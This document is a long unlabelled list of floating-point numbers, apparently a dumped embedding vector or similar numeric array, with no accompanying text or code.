0.014545544981956482, 0.011429689824581146, 0.009574838913977146, 0.015352001413702965, -0.023225950077176094, -0.014384252950549126, -0.0034311062190681696, 0.005553553346544504, 0.03319668769836426, 0.010403290390968323, -0.028094016015529633, -0.022375505417585373, 0.025821274146437645, 0.010997135192155838, -0.0029399008490145206, -0.006825555581599474, -0.009017650969326496, 0.007822629064321518, 0.007668669335544109, 0.008115885779261589, -0.00023735483409836888, 0.02573329769074917, -0.019853495061397552, -0.019398946315050125, 0.027830084785819054, 0.005219973623752594, 0.012895974330604076, -0.0066862585954368114, 0.0020912885665893555, -0.014523549936711788, -0.01164230052381754, -0.013775745406746864, 0.0005315282032825053, -0.004956042394042015, -0.007027169689536095, -0.01071120984852314, 0.02992687188088894, 0.027815422043204308, 0.040146876126527786, 0.0009393386426381767, 0.02280072681605816, 0.0029692265670746565, 0.005509564653038979, -0.012155500240623951, -0.019222993403673172, -0.0018933401443064213, -0.019956134259700775, 0.004076271317899227, 0.02765413001179695, -0.012873980216681957, 0.015190709382295609, -0.007807966321706772, -0.03472162410616875, 0.03994159772992134, -0.022360842674970627, -0.003315636422485113, -0.0076833320781588554, -0.026114530861377716, -0.012895974330604076, -0.022096911445260048, -0.008174537681043148, -0.000302421220112592, 0.03445769101381302, 0.01948692463338375, 0.008211194537580013, 0.003728028852492571, 0.0038453317247331142, -0.020337369292974472, -0.04384191334247589, -0.02120247669517994, -0.026451775804162025, -0.00239920848980546, 0.0016394896665588021, -0.009413547813892365, -0.0003686331328935921, -0.004758093971759081, 0.0011290392139926553, 0.00918627344071865, -0.016656994819641113, 0.01514672115445137, 0.015029418282210827, -0.006634938530623913, -0.009266919456422329, -0.021510396152734756, 0.019354958087205887, 0.03026411682367325, -0.008475125767290592, 0.003169007832184434, 0.0033174692653119564, 0.009010319598019123, -0.00729476660490036, 0.003940640017390251, -0.0024321998935192823, -0.001845685881562531, -0.005428919102996588, 0.005212642252445221, -0.004453839734196663, 0.005791824776679277, 0.01778603345155716, -0.00003307732185930945, 0.005051350686699152, 0.0034915904980152845, 0.006634938530623913, -0.0033797863870859146, -0.024047069251537323, 0.029149740934371948, -0.007313095033168793, 0.009105628356337547, 0.007232449483126402, -0.0011546992463991046, 0.003245987929403782, 0.013511814177036285, -0.009259588085114956, -0.0009970735991373658, -0.012947293929755688, 0.012500077486038208, -0.006766904145479202, 0.0230206698179245, 0.000624087464530021, -0.00796192605048418, -0.007144472561776638, -0.02673036977648735, -0.01310858502984047, -0.0010117364581674337, 0.0053519392386078835, 0.005373933352530003, 0.02052798680961132, -0.0027364538982510567, -0.015542617999017239, -0.01412765309214592, -0.0025513353757560253, -0.01989748328924179, -0.0037793489173054695, 0.03809407725930214, 0.0013077426701784134, -0.0050733452662825584, -0.01325521431863308, -0.007580691948533058, 0.003341296222060919, 0.026642393320798874, 0.0036437176167964935, 0.012720020487904549, 0.022287527099251747, 0.022918030619621277, 0.011884237639605999, 0.003561238991096616, -0.0041862428188323975, -0.008438468910753727, 0.008211194537580013, 0.02016141451895237, 0.020073438063263893, -0.013372517190873623, -0.0005379432113841176, 0.005648862104862928, -0.01882709562778473, 0.011143763549625874, 0.0071481382474303246, -0.008482457138597965, -0.016085144132375717, -0.022712750360369682, 0.015234698541462421, 0.0076906634494662285, -0.009978067129850388, -0.020923882722854614, -0.005777162034064531, 0.002309398492798209, 0.01771271973848343, 0.01458953320980072, -0.005260296631604433, -0.008269845508038998, 0.005989773198962212, 0.026041217148303986, -0.023196624591946602, -0.003678541863337159, -0.014648184180259705, -0.004120260011404753, 0.017258170992136, -0.0100220562890172, -0.01284465380012989, 0.004208237398415804, -0.0057075135409832, 0.01230945996940136, -0.019237656146287918, -0.011041124351322651, -0.0032588178291916847, 0.007573360577225685, -0.0028024367056787014, -0.012148168869316578, 0.019633552059531212, 0.009846101514995098, -0.002512845443561673, 0.00889301672577858, -0.007778640370815992, -0.017023565247654915, 0.0038306687492877245, 0.00432553980499506, 0.005964112933725119, -0.012566059827804565, -0.003154345089569688, -0.000437823444372043, -0.019442936405539513, -0.001085967174731195, -0.0034989218693226576, 0.0018200259655714035, 0.009904753416776657, -0.003156177932396531, 0.007756646256893873, 0.008863691240549088, 0.020542649552226067, 0.008049903437495232, 0.011634969152510166, 0.013225887902081013, -0.002798771020025015, -0.004717770963907242, -0.02108517475426197, 0.005615870468318462, 0.01148834079504013, -0.014200967736542225, 0.017199520021677017, -0.008915010839700699, 0.005447247996926308, 0.018167268484830856, -0.0026521424297243357, -0.002474355511367321, -0.00018305648700334132, 0.026715707033872604, -0.006176724564284086, -0.004248559940606356, -0.020733265206217766, -0.0211584884673357, -0.01381240226328373, 0.008533776737749577, -0.007001509424299002, -0.0055205621756613255, -0.011517666280269623, 0.005791824776679277, 0.010733203962445259, -0.03504420444369316, 0.021598374471068382, -0.0003470970841590315, -0.0067962296307086945, -0.011283060535788536, -0.013233219273388386, 0.011143763549625874, 0.004842405207455158, 0.019237656146287918, 0.020352032035589218, -0.0008728976245038211, -0.015953177586197853, 0.0008591511868871748, -0.01004405040293932, 0.034399040043354034, -0.019017713144421577, 0.004934048280119896, -0.005733173340559006, -0.008592428639531136, 0.005414256360381842, 0.002578828250989318, -0.005436250474303961, 0.005403259303420782, -0.021363768726587296, -0.001751293777488172, -0.004820411093533039, -0.01681828498840332, -0.03832868114113808, 0.0038086746353656054, -0.00993407890200615, 0.0035227490589022636, -0.003442103508859873, 0.012353449128568172, 0.0036638788878917694, -0.02234617993235588, -0.013445830903947353, 0.0043292054906487465, 0.008035240694880486, 0.02161303721368313, 0.0016898931935429573, 0.009904753416776657, 0.009508856572210789, -0.015879863873124123, 0.03237556666135788, -0.0028152666054666042, 0.0095601761713624, -0.03026411682367325, -0.00831383466720581, -0.0023167298641055822, -0.011048455722630024, -0.007496380712836981, -0.012917968444526196, -0.028973786160349846, 0.011202415451407433, 0.005769830197095871, -0.01221415214240551, -0.0032184950541704893, 0.027375536039471626, -0.009442873299121857, 0.010945815593004227, -0.025029480457305908, -0.0035667375195771456, 0.0030058836564421654, -0.01033730711787939, -0.003951637540012598, 0.0016596510540693998, 0.004838739521801472, 0.015762560069561005, 0.011898900382220745, 0.01834322139620781, -0.01514672115445137, 0.009406216442584991, 0.012837322428822517, -0.0031066907104104757, -0.014560207724571228, 0.0010099036153405905, -0.0002472064516041428, 0.0071151466108858585, 0.003315636422485113, -0.003933308646082878, -0.01674497127532959, -0.007947263307869434, -0.025220097973942757, -0.020586637780070305, -0.003412777790799737, 0.006539629772305489, -0.02086523175239563, -0.008658410981297493, -0.008599760010838509, -0.008731725625693798, -0.00037046600482426584, 0.007357083726674318, -0.0031360164284706116, -0.008475125767290592, 0.003783014602959156, -0.0059751104563474655, -0.003524581901729107, -0.013291871175169945, 0.013797739520668983, 0.00511366780847311, 0.022786064073443413, 0.006169393192976713, 0.000522363930940628, -0.02561599388718605, 0.009164279326796532, 0.005674521904438734, -0.025557342916727066, 0.0015707574784755707, 0.014970767311751842, -0.02573329769074917, -0.0034769277554005384, -0.019179005175828934, -0.026789022609591484, 0.004153251647949219, 0.0023973756469786167, 0.006741243880242109, 0.016099806874990463, -0.00855577178299427, 0.02268342487514019, -0.007881280034780502, 0.020894557237625122, -0.0009759957902133465, -0.014758155681192875, 0.02762480452656746, 0.008599760010838509, -0.003838000353425741, 0.008856359869241714, -0.0067009213380515575, -0.023328589275479317, 0.008167206309735775, -0.004761759657412767, -0.029604287818074226, 0.01186224352568388, 0.014919446781277657, 0.002467024140059948, -0.019838832318782806, -0.020806580781936646, -0.002609986811876297, 0.007676000706851482, 0.019501587375998497, 0.02108517475426197, -0.006414995528757572, -0.00002677687916730065, -0.006898869760334492, 0.014860795810818672, -0.007829960435628891, -0.01013202778995037, 0.002587992465123534, 0.03744891285896301, 0.008900348097085953, -0.01637840084731579, 0.01492677815258503, -0.009362228214740753, 0.006400332786142826, -0.012492746114730835, 0.011481009423732758, -0.010454609990119934, 0.01314524281769991, -0.020923882722854614, 0.009633490815758705, -0.01335052214562893, -0.0008958083344623446, 0.013827065005898476, -0.013944367878139019, -0.0040506115183234215, 0.006539629772305489, -0.0028849150985479355, -0.005432584788650274, 0.009633490815758705, 0.027522163465619087, -0.003999291453510523, 0.02910575270652771, 0.011869574896991253, 0.01589452661573887, 0.009992730803787708, -0.007291100919246674, -0.018460525199770927, -0.01295462530106306, -0.0036272217985242605, -0.008629085496068, 0.03096793405711651, 0.001028232160024345, -0.0007116062915883958, 0.009816776029765606, -0.013365184888243675, -0.014156979508697987, 0.011737609282135963, -0.012800665572285652, 0.012917968444526196, -0.001717385952360928, -0.019222993403673172, 0.004838739521801472, 0.05648128688335419, 0.003775683231651783, -0.01117308996617794, 0.001574423280544579, -0.008673073723912239, -0.01997079886496067, 0.00006140067125670612, -0.01208218652755022, 0.005953115876764059, -0.003951637540012598, -0.013687768019735813, -0.012023534625768661, 0.00647731265053153, -0.003176339203491807, 0.004171580076217651, -0.008592428639531136, -0.010872500948607922, -0.044164497405290604, -0.04912053793668747, -0.014266950078308582, 0.026187844574451447, 0.015733234584331512, 0.0009448372293263674, -0.002351554110646248, -0.010960478335618973, -0.002375381300225854, -0.014992761425673962, 0.004926716908812523, -0.014076333492994308, 0.012096849270164967, 0.020029449835419655, -0.005868804641067982, -0.0004472168511711061, -0.003995625767856836, 0.02639312483370304, -0.025513354688882828, 0.0021847642492502928, -0.006136401556432247, -0.002952730981633067, -0.0005718510365113616, -0.01953091286122799, -0.008350491523742676, -0.02929636836051941, -0.004772756714373827, -0.003119520843029022, -0.005033022258430719, -0.006785232573747635, 0.013130580075085163, 0.0072764381766319275, -0.0013948034029453993, -0.023885779082775116, -0.009523519314825535, -0.0037940116599202156, -0.01173027791082859, -0.010300650261342525, 0.004054277203977108, -0.007654006127268076, -0.009787450544536114, 0.01461152732372284, 0.004736099857836962, -0.009978067129850388, -0.012646705843508244, -0.008189200423657894, -0.016495702788233757, -0.015674583613872528, -0.012228814885020256, 0.015909189358353615, 0.007785971742123365, -0.021510396152734756, -0.00153868249617517, 0.016788959503173828, 0.0053995936177670956, 0.013724424876272678, -0.023695161566138268, -0.01956023834645748, -0.016715645790100098, 0.011099775321781635, -0.007067492231726646, 0.0019299972336739302, -0.013805070891976357, 0.018255244940519333, -0.02587992511689663, -0.008211194537580013, -0.00842380616813898, -0.006539629772305489, -0.020352032035589218, 0.019692203029990196, 0.0015753397019580007, -0.003344962140545249, 0.014948773197829723, 0.01093115285038948, -0.0029142408166080713, -0.016730308532714844, -0.007045498117804527, -0.04507359117269516, 0.0033797863870859146, 0.0207919180393219, 0.0014305440708994865, -0.023827126249670982, 0.005293287802487612, -0.005659859161823988, -0.009736130945384502, 0.019574901089072227, 0.0038233373779803514, 0.00887102261185646, -0.007096818182617426, -0.007027169689536095, -0.000938422221224755, -0.014208299107849598, 0.035806674510240555, 0.04146653041243553, 0.009860765188932419, 0.010938484221696854, 0.004340203013271093, 0.007126143667846918, 0.005608539097011089, -0.0014067168813198805, 0.007214121054857969, -0.0013755583204329014, 0.01640772633254528, 0.0017018066719174385, 0.015352001413702965, -0.0029545638244599104, 0.0039149802178144455, 0.004494162742048502, 0.013687768019735813, -0.001615662476979196, 0.010293318890035152, 0.009076302871108055, -0.005832147318869829, 0.007998582907021046, -0.006510304287075996, -0.013673105277121067, -0.007917937822639942, 0.010102701373398304, 0.006671595387160778, 0.018240582197904587, 0.00865107960999012, -0.009501525200903416, 0.014428242109715939, 0.0170822162181139, -0.006902535445988178, 0.027243569493293762, -0.003984628710895777, -0.023695161566138268, -0.011539660394191742, 0.015557280741631985, 0.008885685354471207, 0.002663139719516039, 0.013907711021602154, -0.03947238624095917, 0.00525296526029706, -0.004252225626260042, -0.019545575603842735, -0.0017155531095340848, 0.004079937469214201, -0.010975141078233719, 0.010117365047335625, -8.770501835897448e-7, -0.032874103635549545, -0.027008965611457825, -0.029428334906697273, -0.0005672689294442534, -0.01057924423366785, 0.00685121538117528, -0.004563811235129833, 0.004002957139164209, -0.003365123411640525, -0.003132350742816925, -0.010593906976282597, -0.030058836564421654, -0.013203893788158894, -0.02554268017411232, 0.014442904852330685, 0.03152512013912201, -0.056862521916627884, -0.02312331087887287, 0.016803622245788574, -0.006099744699895382, 0.018959062173962593, 0.013335859403014183, 0.0053592706099152565, -0.023709824308753014, -0.03152512013912201, -0.009758125059306622, -0.00604109326377511, -0.008086560294032097, -0.0308213047683239, 0.0036565475165843964, -0.01919366791844368, -0.002910575130954385, -0.012998614460229874, -0.013929705135524273, -0.0009251339943148196, -0.02338724210858345, 0.0017540431581437588, -0.016569018363952637, -0.0022635769564658403, -0.0028042695485055447, -0.010439947247505188, 0.0075220405124127865, -0.010007393546402454, 0.0062537044286727905, 0.01434759609401226, 0.01904703862965107, -0.020352032035589218, -0.006015432998538017, -0.005883467383682728, 0.026906324550509453, -0.0014232125831767917, 0.031026585027575493, 0.0070528294891119, 0.008665742352604866, -0.01210418064147234, 0.01164230052381754, -0.004424514248967171, 0.023108648136258125, -0.004827742464840412, 0.01574789732694626, -0.005615870468318462, -0.0012509241933003068, -0.0019391615642234683, -0.0024725226685404778, 0.017610078677535057, -0.009193604812026024, -0.0030755321495234966, 0.01028598751872778, 0.008856359869241714, -0.030234791338443756, 0.005865138955414295, 0.010102701373398304, -0.003388950601220131, -0.019281644374132156, 0.00865107960999012, -0.0020381356589496136, -0.006074084434658289, -0.006305024493485689, 0.01670098304748535, 0.0016798124415799975, -0.0183725468814373, -0.020440008491277695, -0.015909189358353615, -0.008372485637664795, -0.03085063025355339, 0.022096911445260048, 0.006074084434658289, 0.013966361992061138, 0.0008243269403465092, -0.013343190774321556, 0.02023473009467125, 0.0198681578040123, 0.015674583613872528, 0.01197221502661705, 0.017214182764291763, 0.007445060648024082, -0.008636416867375374, -0.008145211264491081, -0.007661337498575449, -0.040557436645030975, 0.022111574187874794, -0.013841727748513222, 0.012236146256327629, -0.0004394272109493613, 0.006360010243952274, -0.0005365685792639852, 0.011979546397924423, -0.007734652142971754, -0.026789022609591484, -0.0059347874484956264, -0.029648277908563614, -0.009846101514995098, 0.004967039451003075, 0.012324122712016106, 0.0019208330195397139, -0.002897745231166482, -0.009303576312959194, -0.011319718323647976, -0.02985355630517006, 0.010615901090204716, 0.006165727507323027, 0.019809506833553314, -0.0033248006366193295, -0.013335859403014183, 0.005571881774812937, -0.01670098304748535, 0.025982566177845, 0.015865201130509377, -0.008401811122894287, -0.02224353887140751, 0.0020363028161227703, -0.006063087377697229, -0.0023900440428406, -0.001180359162390232, -0.009838770143687725, 0.007734652142971754, -0.009699473157525063, -0.013775745406746864, -0.010212672874331474, 0.024486955255270004, 0.00827717687934637, 0.0004254516679793596, 0.0005979692214168608, -0.0045381514355540276, 0.02082124352455139, 0.022008933126926422, 0.03436971455812454, -0.015791887417435646, 0.010645227506756783, -0.016290422528982162, -0.012492746114730835, -0.009384222328662872, -0.017258170992136, 0.019618889316916466, 0.005128331016749144, 0.018533838912844658, -0.021774327382445335, -0.00980211328715086, 0.006513969972729683, 0.007214121054857969, 0.049179188907146454, -0.003046206431463361, 0.01730215921998024, -0.010799187235534191, 0.018357884138822556, 0.0068035610020160675, -0.006206050049513578, -0.006821889895945787, -0.007038166746497154, -0.016246434301137924, 0.0035759019665420055, -0.01730215921998024, -0.01119508408010006, -0.004978036507964134, -0.01670098304748535, -0.01117308996617794, -0.006239041686058044, -0.008929673582315445, -0.015791887417435646, 0.010403290390968323, -0.00865107960999012, 0.008746388368308544, -0.0068292212672531605, 0.000788586272392422, 0.0035960632376372814, 0.02736087329685688, -0.029193729162216187, 0.007096818182617426, -0.019985461607575417, -0.005564550403505564, 0.011202415451407433, 0.024853525683283806, -0.010190678760409355, -0.012793334200978279, -0.010630563832819462, -0.028504574671387672, 0.013291871175169945, 0.02064528875052929, 0.0011042957194149494, 0.01436959020793438, -0.011590980924665928, -0.009032313711941242, 0.02891513518989086, -0.012030865997076035, -0.02346055582165718, 0.01119508408010006, -0.02275673858821392, -0.02539605088531971, 0.005373933352530003, 0.0010236500529572368, -0.012624711729586124, -0.0013920540222898126, -0.0010997134959325194, -0.0006937359576113522, -0.004508825484663248, 0.028006037697196007, 0.0019794844556599855, 0.015264024026691914, 0.013724424876272678, 0.004714105278253555, 0.01856316439807415, 0.0077493148855865, -0.0024102055467665195, -0.0004811246762983501, 0.031877029687166214, -0.01890040934085846, -0.00001616636109247338, 0.0063966671004891396, -0.003205664921551943, -0.007408403791487217, 0.04058676213026047, -0.007976588793098927, 0.014860795810818672, 0.010051381774246693, -0.004395188298076391, 0.006074084434658289, 0.007727320306003094, -0.0021536056883633137, -0.0017732881242409348, 0.0011382035445421934, 0.0011583649320527911, -0.014802143909037113, -0.015645258128643036, 0.0016678988467901945, -0.00022429574164561927, 0.03026411682367325, 0.03395915403962135, -0.01060123834758997, -0.006425993051379919, 0.0013553969329223037, 0.010747866705060005, -0.00399196008220315, -0.04149585962295532, -0.007188460789620876, -0.00807189755141735, 0.03346061706542969, -0.004743431229144335, 0.0056635248474776745, 0.0027951053343713284, 0.0006080499733798206, -0.009068971499800682, -0.035923976451158524, 0.02743418700993061, -0.0037316945381462574, 0.0024083727039396763, 0.012096849270164967, -0.0039076488465070724, -0.020630626007914543, 0.013137911446392536, 0.02001478709280491, -0.002927070949226618, -0.004237562883645296, 0.015308012254536152, 0.007324092090129852, -0.00022727414034307003, 0.004761759657412767, 0.00887102261185646, -0.008013245649635792, -0.026833010837435722, -0.0020179743878543377, -0.008269845508038998, -0.007067492231726646, -0.003715198952704668, -0.004875396843999624, -0.011473678052425385, 0.0038233373779803514, 0.033284664154052734, 0.008453131653368473, 0.000894891913048923, 0.0038709917571395636, 0.005498567596077919, 0.011979546397924423, -0.008013245649635792, 0.02929636836051941, 0.005722176283597946, -0.006015432998538017, 0.010417953133583069, -0.0016514031449332833, -0.0005461910623125732, 0.006231710314750671, 0.005516896490007639, -0.010432615876197815, -0.002338724210858345, 0.015102732926607132, 0.019721530377864838, 0.019780181348323822, 0.01659834384918213, -0.007705326192080975, 0.002994886599481106, -0.01674497127532959, -0.017800696194171906, 0.004241228569298983, -0.01405433937907219, 0.01388571597635746, -0.00854110810905695, -0.018695130944252014, 0.0072434465400874615, -0.006319687236100435, 0.0033248006366193295, 0.010183347389101982, -0.006781566888093948, -0.021920956671237946, 0.00604109326377511, -0.01585053838789463, -0.005945784505456686, 0.0008857276407070458, -0.0017302159685641527, -0.005480239167809486, 0.012536734342575073, 0.013871053233742714, -0.0010227336315438151, 0.006129070185124874, 0.016979577019810677, 0.009736130945384502, -0.006579952780157328, -0.004241228569298983, -0.01659834384918213, 0.0028390937950462103, 0.004395188298076391, -0.015117395669221878, -0.0026136524975299835, 0.008387148380279541, -0.01774204522371292, 0.0019556572660803795, -0.01052792463451624, 0.02082124352455139, 0.010645227506756783, -0.0036418847739696503, 0.030234791338443756, 0.006887872703373432, 0.017903337255120277, -0.021217139437794685, 0.01812327839434147, -0.010073375888168812, 0.004123925697058439, -0.005571881774812937, -0.006535964086651802, 0.005945784505456686, -0.011224409565329552, -0.020850569009780884, -0.009662816300988197, 0.018621815368533134, -0.013211225159466267, 0.017404800280928612, 0.011847580783069134, -0.017346147447824478, 0.005003696773201227, 0.004970705136656761, 0.030791979283094406, -0.007122477982193232, -0.020879894495010376, -0.0017082217382267118, 0.009435541927814484, 0.006305024493485689, 0.0019409944070503116, -0.004391522612422705, -0.02891513518989086, -0.0016733974916860461, 0.003881988814100623, 0.026715707033872604, -0.007859285920858383, 0.0075147091411054134, 0.02123180218040943, -0.010791855864226818, -0.00857776589691639, 0.006689924281090498, 0.009215599857270718, 0.010755198076367378, 0.007903275080025196, 0.00967014767229557, -0.009860765188932419, -0.004615131299942732, -0.005044019315391779, 0.006132735870778561, -0.011627637781202793, -0.0007088570273481309, 0.014428242109715939, -0.011283060535788536, -0.03671576827764511, 0.01637840084731579, 0.0002999010612256825, -0.003057203721255064, 0.008027909323573112, -0.022448819130659103, -0.005186982452869415, 0.008211194537580013, 0.0348975770175457, -0.0014690340030938387, -0.003145180642604828, 0.0035814004950225353, 0.010212672874331474, -0.010762530378997326, 0.0008014162303879857, 0.004886393900960684, 0.0007826294749975204, -0.008658410981297493, -0.002203092910349369, 0.022844716906547546, 0.01693558879196644, -0.013093922287225723, -0.01956023834645748, 0.028680529445409775, -0.01093115285038948, 0.006671595387160778, 0.004197239875793457, 0.01039595901966095, 0.025865262374281883, 0.02086523175239563, -0.014692173339426517, -0.01425961870700121, -0.03026411682367325, -0.0028335952665656805, -0.009860765188932419, 0.004123925697058439, -0.0021132829133421183, -0.0025146782863885164, -0.015366664156317711, 0.019237656146287918, -0.005722176283597946, -0.008643748238682747, -0.0028280967380851507, 0.006037427578121424, 0.0012445091269910336, -0.022302189841866493, 0.012074855156242847, 0.01494144182652235, 0.01960422657430172, 0.0075293718837201595, -0.03724363073706627, 0.0063563440926373005, 0.0013709762133657932, -0.004743431229144335, 0.00740473810583353, 0.01370243076235056, 0.027932723984122276, -0.010652558878064156, 0.006726581137627363, 0.003002217970788479, -0.0017833687597885728, -0.0015835874946787953, 0.004593136720359325, -0.00047608432942070067, -0.02639312483370304, -0.0059751104563474655, 0.0020766258239746094, 0.002905076602473855, 0.012126174755394459, 0.01033730711787939, 0.013049934059381485, -0.008211194537580013, -0.006935526616871357, -0.004061608575284481, 0.011253735050559044, 0.029091089963912964, 0.013343190774321556, -0.013482487760484219, -0.030909281224012375, 0.015425315126776695, 0.03331398963928223, 0.0044978284277021885, 0.011341712437570095, 0.015615932643413544, -0.013687768019735813, -0.04478033632040024, -0.007195792160928249, -0.022360842674970627, -0.008915010839700699, -0.022668762132525444, 0.0059347874484956264, -0.00649564154446125, -0.006572621408849955, 0.005740504711866379, -0.0035209162160754204, -0.010014724917709827, -0.0019941471982747316, 0.026935650035738945, -0.0029563966672867537, -0.006865878123790026, -0.007060160860419273, 0.011598312295973301, 0.020777255296707153, -0.0037243631668388844, -0.011121769435703754, 0.01630508527159691, -0.011033792980015278, -0.013064596801996231, -0.001891507301479578, -0.0270969420671463, -0.0012417598627507687, -0.016217108815908432, -0.0024523611646145582, -0.003509919159114361, 0.011832918040454388, 0.006451652850955725, 0.00730576366186142, -0.00038535796920768917, 0.010410621762275696, 0.007595354691147804, -0.00004599322710419074, 0.007859285920858383, 0.04079204052686691, -0.00878304522484541, 0.028313959017395973, 0.03307938203215599, 0.008497119881212711, 0.010667221620678902, 0.013189231045544147, -0.003267982043325901, 0.0258066114038229, -0.008988325484097004, 0.003966300282627344, 0.021774327382445335, 0.0011601977748796344, 0.015220035798847675, 0.009648153558373451, 0.01119508408010006, 0.006444321479648352, -0.001456203986890614, 0.00918627344071865, -0.014244955964386463, 0.0041935741901397705, -0.013093922287225723, -0.0000509476667502895, -0.009523519314825535, -0.012001540511846542, -0.005579213611781597, 0.01093115285038948, 0.018064627423882484, -0.004241228569298983, -0.0027804423589259386, 0.017551427707076073, 0.0025000155437737703, -0.013805070891976357, -0.007298432290554047, 0.008629085496068, -0.006616609636694193, 0.009208268485963345, 0.006371007300913334, 0.006832886952906847, 0.0049193850718438625, 0.0013599790399894118, 0.01039595901966095, -0.003070033621042967, -0.0019739859271794558, -0.002663139719516039, 0.001676146755926311, -0.024193698540329933, -0.01897372491657734, 0.005579213611781597, -0.0027291225269436836, -0.009926747530698776, -0.007844623178243637, -0.01607048138976097, 0.0009485029149800539, -0.0033504606690257788, 0.004787419456988573, -0.005432584788650274, -0.015982503071427345, 0.0024596925359219313, -0.008482457138597965, -0.02280072681605816, 0.0022324183955788612, 0.006345347035676241, -0.02873918041586876, 0.006136401556432247, 0.004068939946591854, 0.01752210222184658, -0.0030993593391031027, -0.015176046639680862, -0.004651788156479597, 0.00696118688210845, -0.006766904145479202, 0.011942889541387558, 0.014252287335693836, -0.02639312483370304, 0.006858546752482653, -0.007206789217889309, 0.0071078152395784855, -0.0022635769564658403, 0.006000770255923271, -0.01570390909910202, 0.012338786385953426, -0.0002247539523523301, 0.001001655706204474, 0.012507408857345581, 0.015234698541462421, -0.019956134259700775, -0.0031836708076298237, 0.008189200423657894, 0.017507439479231834, -0.011231740936636925, 0.02428167499601841, 0.0075220405124127865, -0.013445830903947353, -0.0029765579383820295, -0.010234666988253593, 0.005337276495993137, 0.0017934495117515326, 0.006642269901931286, 0.013709762133657932, 0.0007734652026556432, 0.007313095033168793, 0.003775683231651783, 0.027888735756278038, -0.002723623998463154, -0.030322767794132233, 0.012478083372116089, -0.020396020263433456, -0.011180421337485313, -0.003119520843029022, 0.010659890249371529, -0.000056303040764760226, 0.009083634242415428, -0.00807189755141735, 0.017287496477365494, -0.006645935587584972, 0.007129809353500605, -0.003341296222060919, 0.012712688185274601, 0.02328460104763508, 0.006319687236100435, -0.006184055935591459, -0.007573360577225685, 0.00868773739784956, -0.012382774613797665, -0.005058682523667812, -0.0036437176167964935, -0.0016294089145958424, 0.007947263307869434, -0.010762530378997326, 0.012939962558448315, 0.002201259834691882, -0.0012316792272031307, -0.011708283796906471, 0.013599790632724762, -0.013504482805728912, 0.0006923613254912198, -0.006766904145479202, -0.005612204782664776, -0.0013874719152227044, -0.005912793334573507, -0.007807966321706772, 0.0059494501911103725, -0.004948711022734642, -0.005373933352530003, 0.01863647811114788, 0.02011742629110813, 0.030762653797864914, 0.018548501655459404, 0.019662877544760704, -0.007144472561776638, 0.006455318536609411, 0.011187752708792686, -0.0040836031548678875, -0.003827003063634038, -0.006909866817295551, -0.0052566309459507465, 0.023269938305020332, 0.004607799928635359, -0.0002465191064402461, 0.006491975858807564, 0.008431137539446354, -0.029135078191757202, 0.0016798124415799975, 0.0019538244232535362, 0.0016486538806930184, 0.0012115177232772112, 0.004611465614289045, 0.008379817008972168, 0.010923821479082108, 0.0030736993066966534, 0.0027804423589259386, 0.014039676636457443, 0.012221483513712883, 0.03055737353861332, -0.0065322984009981155, -0.007181129418313503, -0.007126143667846918, 0.02847524918615818, 0.0053995936177670956, -0.024252349510788918, 0.006316021550446749, 0.0015955010894685984, -0.0000033900673770403955, -0.009963404387235641, 0.015835875645279884, -0.007719988934695721, -0.01527868676930666, -0.0031506794039160013, -0.001354480511508882, -0.003676709020510316, 0.007192126475274563, -0.010381296277046204, -0.005549887660890818, -0.000021493098756764084, -0.015542617999017239, -0.012500077486038208, 0.024369651451706886, -0.0012362613342702389, -0.001513939001597464, -0.019061701372265816, -0.005326279439032078, -0.008042572066187859, 0.023519206792116165, -0.0070528294891119, -0.007016172632575035, -0.00182369165122509, -0.004002957139164209, 0.004270554054528475, -0.022258201614022255, -0.01703822799026966, 0.01604115404188633, 0.007005175109952688, -0.002104118699207902, -0.02423768676817417, 0.006737578194588423, 0.005267628002911806, -0.004736099857836962, 0.014112990349531174, -0.022228876128792763, -0.005791824776679277, -0.00685121538117528, -0.024824200198054314, 0.019032375887036324, -0.0038489974103868008, 0.007800634950399399, 0.00602276436984539, -0.0008037073421292007, -0.014090996235609055, -0.0025091797579079866, 0.0006524967029690742, -0.007668669335544109, 0.0030058836564421654, -0.009076302871108055, 0.016715645790100098, 0.009545513428747654, -0.006239041686058044, 0.014838801696896553, 0.016246434301137924, 0.0003065451455768198, -0.002375381300225854, -0.005381265189498663, 0.007624680642038584, 0.007544035091996193, -0.005036687944084406, -0.010168684646487236, 0.008394479751586914, -0.013695099391043186, -0.003247820772230625, 0.003684040391817689, 0.005865138955414295, -0.011744940653443336, 0.0000737724476493895, 0.016158457845449448, -0.005377599038183689, 0.00307186646386981, 0.0037573545705527067, 0.00159641751088202, 0.02011742629110813, -0.01258805487304926, -0.019105689600110054, 0.006462649907916784, -0.011979546397924423, 0.01496343594044447, -0.012001540511846542, 0.001608331105671823, -0.011048455722630024, -0.018680468201637268, -0.005051350686699152, 0.012236146256327629, -0.03002951107919216, 0.0005141160800121725, 0.007881280034780502, -0.015308012254536152, 0.02297668159008026, -0.027712780982255936, 0.022668762132525444, -0.005425253417342901, -0.011986877769231796, 0.001391137600876391, 0.01752210222184658, 0.0027712781447917223, 0.03290342912077904, 0.011627637781202793, -0.015791887417435646, -0.02450161799788475, -0.011070449836552143, 0.008834365755319595, 0.0180059764534235, -0.011224409565329552, -0.0052456334233284, -0.030014848336577415, -0.028504574671387672, -0.001842936617322266, 0.0007858369499444962, -0.011451683938503265, -0.005938453134149313, -0.016055818647146225, 0.009340234100818634, -0.00009593855065759271, -0.004413517192006111, 0.006202384363859892, 0.04302079230546951, -0.027595479041337967, -0.0059347874484956264, 0.0031506794039160013, -0.0071078152395784855, -0.013761081732809544, 0.05023491382598877, 0.0003686331328935921, 0.04032282903790474, 0.007998582907021046, -0.013651111163198948, 0.00787394866347313, 0.005472907796502113, 0.0014552875654771924, -0.01483147032558918, -0.010256662033498287, -0.010593906976282597, -0.00649564154446125, 0.016085144132375717, -0.02605587989091873, -0.0011446184944361448, -0.002498182700946927, -0.010029387660324574, -0.0028262638952583075, -0.015190709382295609, -0.012961956672370434, 0.007544035091996193, -0.02461891993880272, 0.010997135192155838, -0.0069391923025250435, 0.004549148492515087, 0.016231771558523178, -0.0012115177232772112, -0.03044007159769535, 0.0012509241933003068, -0.00455647986382246, 0.012089517898857594, -0.018460525199770927, -0.003027878003194928, 0.00942821055650711, 0.0031726735178381205, 0.008497119881212711, 0.025894587859511375, 0.013563133776187897, -0.0067962296307086945, 0.0016468210378661752, -0.00857776589691639, 0.009098296985030174, -0.001720135216601193, 0.008196531794965267, -0.003867326071485877, 0.002307565649971366, -0.021891631186008453, 0.019442936405539513, 0.0326688252389431, 0.022096911445260048, 0.009721468202769756, 0.0016211610054597259, -0.0111364321783185, 0.00833582878112793, 0.007705326192080975, 0.003966300282627344, 0.009552844800055027, 